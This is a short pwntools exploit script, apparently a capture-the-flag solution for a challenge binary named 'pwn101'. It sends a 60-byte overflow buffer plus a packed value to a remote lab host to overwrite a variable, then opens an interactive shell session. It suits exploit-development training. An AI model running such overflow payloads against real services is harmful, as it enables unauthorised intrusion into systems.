#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn101", checksec=False)
# r = process()
r = remote("10.10.110.117", 9001)

# funcs
s = lambda a: r.sendlineafter(b":", a)

# buf
buf = b"A"*60
buf += p32(0x1337)
s(buf)

r.interactive()